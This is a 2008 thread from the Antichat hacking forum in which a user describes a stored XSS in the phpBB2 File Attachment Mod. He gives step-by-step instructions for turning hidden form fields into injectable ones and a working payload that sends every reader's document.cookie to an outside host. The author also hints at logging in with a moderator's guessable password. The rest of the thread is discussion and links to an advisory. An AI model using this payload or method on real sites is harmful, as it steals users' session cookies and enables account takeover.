Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   !!! phpBB2 новая активная XSS !!! (https://forum.antichat.xyz/showthread.php?t=67532)

KIR@PRO 16.04.2008 22:05

!!! phpBB2 mod File Attachment Mode новая активная XSS !!!
 
Приношу свои извинения но как выяснилось эта уязвимость не в движке форума а только в его модуле File Attachment Mode версия ниже 2.4.5

привет всем...рассказываю о xss уязвимости найденной мною 14.04.2008 ))))

исходя из сообщения Basurman :

Цитата:

Сообщение от Basurman
2.0.21 или 2.0.22?Как отличить последнюю версию второй ветки (2.0.22) от остальных? (пост восстановлен)
Очень просто. До последней версии был баг (не инъект!) в лимите во всех скритах, где присутствовал постраничный вывод на экран.
Например, в скрипте viewforum.php, который и рассмотрим.
Определить можно, добавив параметр start=-1 в адресной строке, например, к viewforum.php
То есть, если есть ccылка вида:
http://forum/viewforum.php?f=32
Набираем:
http://forum/viewforum.php?f=32&start=-1
Если вываливается с ошибкой - версия <=2.0.21
Если нет - 2.0.22
Код:

Could not obtain topic information

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 12

SELECT t.*, u.username, u.user_id, u2.username as user2, u2.user_id as id2, p.post_username, p2.post_username AS post_username2, p2.post_time FROM topics t, users u, posts p, posts p2, users u2 WHERE t.forum_id = 50 AND t.topic_poster = u.user_id AND p.post_id = t.topic_first_post_id AND p2.post_id = t.topic_last_post_id AND u2.user_id = p2.poster_id AND t.topic_type <> 2 AND t.topic_type <> 3 ORDER BY t.topic_type DESC, t.topic_last_post_id DESC LIMIT -1, 20

Line : 420
File : /xxx/phpbb/viewforum.php

P.S. Все файлы, где есть параметр start можно найти в апдейтере 2.0.22
P.S.S На forums.overclockers.ru стоит не 2.0.22 (ну или сильно криворукий обновляльщик) ;)

рассмотренная мной версия >= 2.0.22

уязвимый скрипт: posting_attachments.php (в него передается из posting.php (судя по ошибке вызываемой пунктом 5 ниже))

Уязвимые поля:
  1. attachment_list[]
  2. filename_list[]
  3. filesize_list[]
  4. filetime_list[]
  5. attach_id_list[] Вызывает ошибку при вводе не числового символа, выводящую sql запрос (не разбирал)

суть уязвимости:
при прикреплении файла к сообщению появляется блок срытых полей (hidden), при отправке сообщения
не обрабатывается скрытое поле filename_list[], и остальные указанные выше, в котором
отображается имя прикрепленого файла. Сохраняем страницу на комп... редактируем изменяя параметр
type у указанных выше полей на text, и изменяем и изменяем action формы на полный
путь типа http://сайт/ди/ри/ктория/posting.php , сохраняем и открываем в браузере.
видим что появилось(ись) текстовые поля дописываем в них HTML или JavaScript или VBScript и т.п. в
зависимости от вашей цели затем отправляем и и наслаждаемся (можно вписать такой код: <script>img=new Image();img.src="http://s.netsec.ru/xx.gif?"+document.cookie;</script> и ждать пока тебе придут cookie :))

все тоже самое с перечисленными выше скриптами...

на 3-й ветке пробовал там уже нету..... :cool:

Video: http://xakep-ru.pochta.ru/phpBB_xss_by_KIR_PRO.rar1644 Кб :D +

если кто то найдет sql как можно использовать ошибку из 5 пункта напишите мне в ЛС я добавлю рядом с 5 пунктом ссылку на твою тему ;)


___________________________________
http://www.hash.ixces.ru/img.gif

не могу найти где подпись делать.... может я ударился головой? напишите если кто знает как подпись делать...

Basurman 16.04.2008 22:15

Ммм... Ты думаешь, жертва сама сохранит страницу и исправит сурс, потом зайдет обратно на форум, чтобы сама себе alert'ы писать типа "ПРЕВЕД"?

KIR@PRO 16.04.2008 22:21

Basurman яж написал АКТИВНАЯ XSS жертве ниче делать не надо....

ты редактируешь страницу... вписываешь в скрытые поля xss и отправляешь... у всех кто читает тему будет выполнятся код....

Basurman 16.04.2008 22:57

Это вопрос был :)

И еще:
В phpBB по умолчанию кидать на форум файлы нельзя. Это делается отдельным модом.
Судя по видео - File Attachment Mode... Какая там версия стоит? Последняя 2.4.5

KIR@PRO 16.04.2008 23:05

Basurman честно скажу не знаю.... админы постарались как можно сильнее всю инфу о версиях спрятать...

а ты умерен что это мод File Attachment Mode и что это вообще мод я просто с phpBB вообще впервые столкнулся подруку попался.... у нас в локалке такой на сервере стоит.... и оказалось что у одного из модеров пароль такойже как ник)))))

hackconnect 16.04.2008 23:10

Цитата:

DEBUG MODE
ни о чем не говорит? :D

Basurman 16.04.2008 23:10

на 2.4.5 не пашет
код посмотрю еще...

http://www.securitylab.ru/vulnerability/273545.php

KIR@PRO 17.04.2008 00:27

тогда будем считать что я нашел как юзать указанную в http://www.securitylab.ru/vulnerability/273545.php уязвимость )))))))) т.к. там не указано в каких параметрах и как юзать))))



bobob а ты к примеру знал как её юзать??? тока честно..... я вот ни где не нашел....

ShadOS 22.04.2008 14:48

Видео к уязвимости: http://video.antichat.ru/file264.html

GreenBear 22.04.2008 15:06

ShadOS, http://www.securitylab.ru/vulnerability/273545.php


Время: 01:04